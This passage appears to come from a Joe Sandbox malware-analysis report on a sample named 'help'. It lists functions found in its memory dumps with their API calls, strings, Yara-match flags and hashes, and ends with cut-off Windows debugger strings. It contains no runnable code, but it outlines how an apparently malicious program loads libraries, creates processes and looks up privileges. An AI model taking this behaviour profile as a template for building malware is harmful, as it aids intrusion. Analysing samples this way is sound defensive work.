Function 03809650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0380965A

Memory Dump Source

Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true

Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37a0000_help.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f923db84a075353d55521d5f5abd0b43b24067ec429777647dc095abba862dcc
Instruction ID: a754fe2768fc37ac731b00994407980d6f91d4c887e0df5d30995608c165a780
Opcode Fuzzy Hash: f923db84a075353d55521d5f5abd0b43b24067ec429777647dc095abba862dcc
Instruction Fuzzy Hash: A490027120509C42D140B1994404F56041997D0345F51C451A10587A4D97658D6DB6A1

Uniqueness

Uniqueness Score: -1.00%

Function 03809A50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03809A5A

Memory Dump Source

Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true

Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37a0000_help.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6741f413dcbb8811a00149df40fd7fb38c384f1a4481e653d767683a312df4ab
Instruction ID: ab9d54a49a59b4abe972bfbd43d2950de35584a9ddd00727bc05e93b4410a482
Opcode Fuzzy Hash: 6741f413dcbb8811a00149df40fd7fb38c384f1a4481e653d767683a312df4ab
Instruction Fuzzy Hash: 2090026121185442D200A5A94C14F17040997D0343F51C555A1148664CCA5588796561

Uniqueness

Uniqueness Score: -1.00%

Function 03809660 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0380966A

Memory Dump Source

Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true

Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37a0000_help.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1679fb4f62bd59c9218aa56fdf8a87f2f44f75a7402ff5a100e573599df4252c
Instruction ID: 4fe62f4958bd0d396700cb332ca24144fbe7110f8feea1b127fec4665ca810e2
Opcode Fuzzy Hash: 1679fb4f62bd59c9218aa56fdf8a87f2f44f75a7402ff5a100e573599df4252c
Instruction Fuzzy Hash: 0090027120105C02D180B1994404B5A040997D1341F91C455A1019764DCB558A6D77E1

Uniqueness

Uniqueness Score: -1.00%

Function 038099A0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 038099AA

Memory Dump Source

Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true

Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37a0000_help.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d09eaf6ddacb1a807efae09c3c5e7859cef998757ae1b1768fbe0757183c5ff0
Instruction ID: 0ab46c001ee3f149fa2c7aa4aaf5b2d443abec2218d5c885702d5f7f2844dfea
Opcode Fuzzy Hash: d09eaf6ddacb1a807efae09c3c5e7859cef998757ae1b1768fbe0757183c5ff0
Instruction Fuzzy Hash: 869002A134105842D100A1994414F160409D7E1341F51C455E2058664D8759CC6A7166

Uniqueness

Uniqueness Score: -1.00%

Function 038095D0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 038095DA

Memory Dump Source

Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true

Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37a0000_help.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e2c75319a498780b048efbc27df1c008c4e486f138e23fce4e6152edda6688a5
Instruction ID: 6815a63fbbe4233078829d03c5710b8dc7da69a1efc1804a07f569ab752ec62a
Opcode Fuzzy Hash: e2c75319a498780b048efbc27df1c008c4e486f138e23fce4e6152edda6688a5
Instruction Fuzzy Hash: CE9002A1202054034105B1994414B26440E97E0241B51C461E20086A0DC66588A97165

Uniqueness

Uniqueness Score: -1.00%

Function 03809910 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0380991A

Memory Dump Source

Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true

Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37a0000_help.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9274681e399034cfa754c0c07b750f6ab9a6ae547bcc1f20a1f6f74dd23c2fc1
Instruction ID: c000a135aded9b6d623a744c4e205e408d5a781b40a81f34f3b5c25437e1be5b
Opcode Fuzzy Hash: 9274681e399034cfa754c0c07b750f6ab9a6ae547bcc1f20a1f6f74dd23c2fc1
Instruction Fuzzy Hash: 619002B120105802D140B1994404B56040997D0341F51C451A6058664E87998DED76A5

Uniqueness

Uniqueness Score: -1.00%

Function 03809540 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0380954A

Memory Dump Source

Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true

Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37a0000_help.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: cec919e79120c9becad1b127475683b2ed1a4833447a755e0251bd717184e59e
Instruction ID: afea4b8adb8334083aa39ce808f0ba95863ae2fb8be264fa853c9761cb5dbc49
Opcode Fuzzy Hash: cec919e79120c9becad1b127475683b2ed1a4833447a755e0251bd717184e59e
Instruction Fuzzy Hash: EA900265211054030105E5990704A17044A97D5391351C461F2009660CD76188796161

Uniqueness

Uniqueness Score: -1.00%

Function 03809840 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0380984A

Memory Dump Source

Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true

Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37a0000_help.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7f1f20f30a5ec174343167962756e8e0209a2b445154af7d0965530d6b6a4c3e
Instruction ID: 1b53f735bbe321a3808b729d704f083b4a195d464584ea72115d4ffb9e766619
Opcode Fuzzy Hash: 7f1f20f30a5ec174343167962756e8e0209a2b445154af7d0965530d6b6a4c3e
Instruction Fuzzy Hash: 52900261242095525545F1994404A17440AA7E0281791C452A2408A60C8666986EE661

Uniqueness

Uniqueness Score: -1.00%

Function 03809860 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0380986A

Memory Dump Source

Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true

Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37a0000_help.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 55fc7f5ccd36039a85507198d9cf2df27b0adc7a5168e2378cc1efc918416441
Instruction ID: 707c54b8ecb28b28836f69db4f6f6407f5d3cda7f8506d0c1fca6f825f59b634
Opcode Fuzzy Hash: 55fc7f5ccd36039a85507198d9cf2df27b0adc7a5168e2378cc1efc918416441
Instruction Fuzzy Hash: C990027120105813D111A1994504B17040D97D0281F91C852A1418668D9796896AB161

Uniqueness

Uniqueness Score: -1.00%

Function 02DD9070 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(000007D0), ref: 02DD9118

Strings

wininet.dll, xrefs: 02DD90CE, 02DD90D7
net.dll, xrefs: 02DD90E1, 02DD9167, 02DD913F, 02DD914B, 02DD9173

Memory Dump Source

Source File: 00000002.00000002.510495926.0000000002DC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2dc0000_help.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: 19b2dc4e8be44f3f682210694da1f207c9745981d98c44c8e79c3de727ddc7e6
Instruction ID: 43d099bb6c9209d47562c6e4a0c7196653b9ffbdf554e9f1f7e5fec36fdd302d
Opcode Fuzzy Hash: 19b2dc4e8be44f3f682210694da1f207c9745981d98c44c8e79c3de727ddc7e6
Instruction Fuzzy Hash: 063190B6900A45BBC724DF64C885FA7B7B9FB48B05F00841DF62E9B344D731A950CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 02DD906C Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 78
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(000007D0), ref: 02DD9118

Strings

wininet.dll, xrefs: 02DD90CE, 02DD90D7
net.dll, xrefs: 02DD90E1, 02DD913F, 02DD914B

Memory Dump Source

Source File: 00000002.00000002.510495926.0000000002DC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2dc0000_help.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: 589d4b9667ac329b3f1fb8b89fce8399507e10d49613020bfbe5f38fc6ea6c3b
Instruction ID: a53481299776a8ce5abe6b4a9c73b1abe74e3a1ec6272e0736182eb862378f99
Opcode Fuzzy Hash: 589d4b9667ac329b3f1fb8b89fce8399507e10d49613020bfbe5f38fc6ea6c3b
Instruction Fuzzy Hash: 8A21F3B1A00705BBC714EF64C885FA7B7B5FB88704F00802DE62D6B344D771A950CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 02DDA660 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02DC3AF8), ref: 02DDA68D

Strings

.z`, xrefs: 02DDA67C, 02DDA688

Memory Dump Source

Source File: 00000002.00000002.510495926.0000000002DC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2dc0000_help.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction ID: 5be677c1dd7c4a313515b6fccfc3c8dc5c0e0f613a4114c39639d2805af66bd9
Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction Fuzzy Hash: 20E01AB12002046BD714DF59CC44EA777ADEF88750F018554B91C57241C630E9108AB0

Uniqueness

Uniqueness Score: -1.00%

Function 02DC8308 Relevance: 3.1, APIs: 2, Instructions: 56
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 02DC836A
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02DC838B

Memory Dump Source

Source File: 00000002.00000002.510495926.0000000002DC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2dc0000_help.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 62a72b44d361acd347777289915aa0c77b2cfcda02be1dcee4380d611d1e23bc
Instruction ID: 67902200c20e27ef5a4f0d6590c761800dc12513bf0425875869845db84a29b4
Opcode Fuzzy Hash: 62a72b44d361acd347777289915aa0c77b2cfcda02be1dcee4380d611d1e23bc
Instruction Fuzzy Hash: 2D01F531A4022976EB21AAA48C42FEE7B6D9B40B51F15021DFF04FB2C1D6A46D068AF1

Uniqueness

Uniqueness Score: -1.00%

Function 02DC8310 Relevance: 3.1, APIs: 2, Instructions: 55
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 02DC836A
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02DC838B

Memory Dump Source

Source File: 00000002.00000002.510495926.0000000002DC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2dc0000_help.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 9f6b7254b568deafea19610ad2f149634f201f71034e907c959efec66b5b2edc
Instruction ID: 824c5dadfcf2db7f8d6ba757a1f3b96211f24afb8cecd3f0cff4aa0a46769039
Opcode Fuzzy Hash: 9f6b7254b568deafea19610ad2f149634f201f71034e907c959efec66b5b2edc
Instruction Fuzzy Hash: F101A731A8022977E721AA949C02FBE776D9B40B55F150119FF04FB2C1E6A46D058AF5

Uniqueness

Uniqueness Score: -1.00%

Function 02DCACE0 Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 02DCAD52

Memory Dump Source

Source File: 00000002.00000002.510495926.0000000002DC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2dc0000_help.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
Instruction ID: 329b3fdc07806a8ded4342c04911be222a6c6975848f2f070c395e0dde38b637
Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
Instruction Fuzzy Hash: 22011EB6D4020EABDF10EAE4DD41F9DB7799B54308F108599E90897240FA71EB14CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 02DDA6D0 Relevance: 1.5, APIs: 1, Instructions: 42
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02DDA724

Memory Dump Source

Source File: 00000002.00000002.510495926.0000000002DC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2dc0000_help.jbxd

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction ID: 4164f77f8237425446f61fa11bb369c8443bd4e23cb598339bae8ecec04f41be
Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction Fuzzy Hash: E101AFB2214108AFCB54DF89DC80EEB77ADAF8C754F158258BA0D97244C630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 02DDA6CE Relevance: 1.5, APIs: 1, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02DDA724

Memory Dump Source

Source File: 00000002.00000002.510495926.0000000002DC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2dc0000_help.jbxd

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: adb983e68d6e016819c03e3451728db19f03a2730776f16b8b72617fdcd69654
Instruction ID: 92141a2932b569681ad1045f413cf88f7bd4891d37400ce1b3fb3c185d5d7ca6
Opcode Fuzzy Hash: adb983e68d6e016819c03e3451728db19f03a2730776f16b8b72617fdcd69654
Instruction Fuzzy Hash: 5C01AFB2210108AFCB54CF89DD80EEB37AEAF8C354F158248BA0DA7244C630E851CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02DD91A0 Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,02DCF040,?,?,00000000), ref: 02DD91DC

Memory Dump Source

Source File: 00000002.00000002.510495926.0000000002DC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2dc0000_help.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: b68e6f369081869e3b8fd31e12c5b2d380daa11ca5a0600d0435d8fbc4efec32
Instruction ID: fea73eebac017eca8cc90ec8425c5d7b82ba6a6447180578a29a4708b531f8ef
Opcode Fuzzy Hash: b68e6f369081869e3b8fd31e12c5b2d380daa11ca5a0600d0435d8fbc4efec32
Instruction Fuzzy Hash: 59E06D373906043AE32065A9AC02FA7B79CCB81B24F150026FA0DEB2C0D595F80146A4

Uniqueness

Uniqueness Score: -1.00%

Function 02DDA620 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(02DD4526,?,02DD4C9F,02DD4C9F,?,02DD4526,?,?,?,?,?,00000000,00000000,?), ref: 02DDA64D

Memory Dump Source

Source File: 00000002.00000002.510495926.0000000002DC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2dc0000_help.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction ID: 374f36fcb86b102a93793da0a6d8dbf8da32643764315dd35f7a71d1304c997d
Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction Fuzzy Hash: 2DE012B2200208ABDB14EF99CC40EA777ADEF88654F118598BA1C5B281C630F9108AB0

Uniqueness

Uniqueness Score: -1.00%

Function 02DDA7C0 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,02DCF1C2,02DCF1C2,?,00000000,?,?), ref: 02DDA7F0

Memory Dump Source

Source File: 00000002.00000002.510495926.0000000002DC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2dc0000_help.jbxd

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction ID: d3e240a4d214942c50f0a1ab51c87b47aa8646d2b24613d4086207ff9e0bac70
Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction Fuzzy Hash: A5E01AB12002086BDB10DF59CC84EE737ADEF88650F018154BA0C57241C930E8108BF5

Uniqueness

Uniqueness Score: -1.00%

Function 02DCF6C4 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,02DC8D14,?), ref: 02DCF6EB

Memory Dump Source

Source File: 00000002.00000002.510495926.0000000002DC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2dc0000_help.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 62b2aceeaa7b0886c603d8303f0e30ba32843c3a21bcba30683509cc1d06c7c1
Instruction ID: 9b817dbd89dc157ed643208795fce078de080db7f5f649d945a7dbcaff53cad7
Opcode Fuzzy Hash: 62b2aceeaa7b0886c603d8303f0e30ba32843c3a21bcba30683509cc1d06c7c1
Instruction Fuzzy Hash: 6CD022926AC3843AFB20BBB0AC03F472B490B01744F1A06A8E88CFF2C3D84CC018413A

Uniqueness

Uniqueness Score: -1.00%

Function 02DCF6C0 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,02DC8D14,?), ref: 02DCF6EB

Memory Dump Source

Source File: 00000002.00000002.510495926.0000000002DC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2dc0000_help.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
Instruction ID: f25bf97325fc19d7ac1fc07fa1c99985d02bb3f7e6bd36b6733eaea541cb3f39
Opcode Fuzzy Hash: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
Instruction Fuzzy Hash: E1D05E626903043BE610BAA4DC02F66328D9B44A04F490064F948973C3D964E4008565

Uniqueness

Uniqueness Score: -1.00%

Function 02DDA765 Relevance: 1.5, APIs: 1, Instructions: 13COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,02DCF1C2,02DCF1C2,?,00000000,?,?), ref: 02DDA7F0

Memory Dump Source

Source File: 00000002.00000002.510495926.0000000002DC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2dc0000_help.jbxd

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 280914c5556fbf1310149cc9cc0bea5dbcd9d4911544087be0d8331a4a847cc2
Instruction ID: 303e38167c364f8f91280411fdd8816f357412192d2e9680079325b90e0ad18b
Opcode Fuzzy Hash: 280914c5556fbf1310149cc9cc0bea5dbcd9d4911544087be0d8331a4a847cc2
Instruction Fuzzy Hash: 56C08C71046A8A6E9721EAA47C50CA7BBACFEC4204304866AFC4882200EB228C10CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 0380967A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03809694

Memory Dump Source

Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true

Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37a0000_help.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c07a334b6f75cd5efb891f5ad5909943385acd43cc3995a7d8a156a91af7f58e
Instruction ID: 1af0dfa8aaa3e4bca2caa01c24db564de267b144821823e2931f99c0a81a84b9
Opcode Fuzzy Hash: c07a334b6f75cd5efb891f5ad5909943385acd43cc3995a7d8a156a91af7f58e
Instruction Fuzzy Hash: B4B09B719014D5C5D651D7E04A08B2B7D047BD0741F17C5D1D2124755B4778C095F5B5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0387B260 Relevance: 37.8, Strings: 30, Instructions: 262COMMONLIBRARYCODE

Download Yara Rule

Strings

This failed because of error %Ix., xrefs: 0387B446
a NULL pointer, xrefs: 0387B4E0
The resource is owned shared by %d threads, xrefs: 0387B37E
an invalid address, %p, xrefs: 0387B4CF
The instruction at %p referenced memory at %p., xrefs: 0387B432
The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 0387B323
<unknown>, xrefs: 0387B27E, 0387B2D1, 0387B350, 0387B399, 0387B417, 0387B48E
If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 0387B314
read from, xrefs: 0387B4AD, 0387B4B2
The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0387B38F
write to, xrefs: 0387B4A6
*** then kb to get the faulting stack, xrefs: 0387B51C
The instruction at %p tried to %s , xrefs: 0387B4B6
*** Resource timeout (%p) in %ws:%s, xrefs: 0387B352
The resource is owned exclusively by thread %p, xrefs: 0387B374
*** enter .cxr %p for the context, xrefs: 0387B50D
*** Inpage error in %ws:%s, xrefs: 0387B418
This means that the I/O device reported an I/O error. Check your hardware., xrefs: 0387B476
The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0387B3D6
*** An Access Violation occurred in %ws:%s, xrefs: 0387B48F
*** A stack buffer overrun occurred in %ws:%s, xrefs: 0387B2F3
*** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 0387B2DC
*** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 0387B53F
This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 0387B47D
This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 0387B305
This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 0387B484
*** enter .exr %p for the exception record, xrefs: 0387B4F1
Go determine why that thread has not released the critical section., xrefs: 0387B3C5
*** Critical Section Timeout (%p) in %ws:%s, xrefs: 0387B39B
The critical section is owned by thread %p., xrefs: 0387B3B9

Memory Dump Source

Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true

Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37a0000_help.jbxd

Similarity

API ID:
String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly 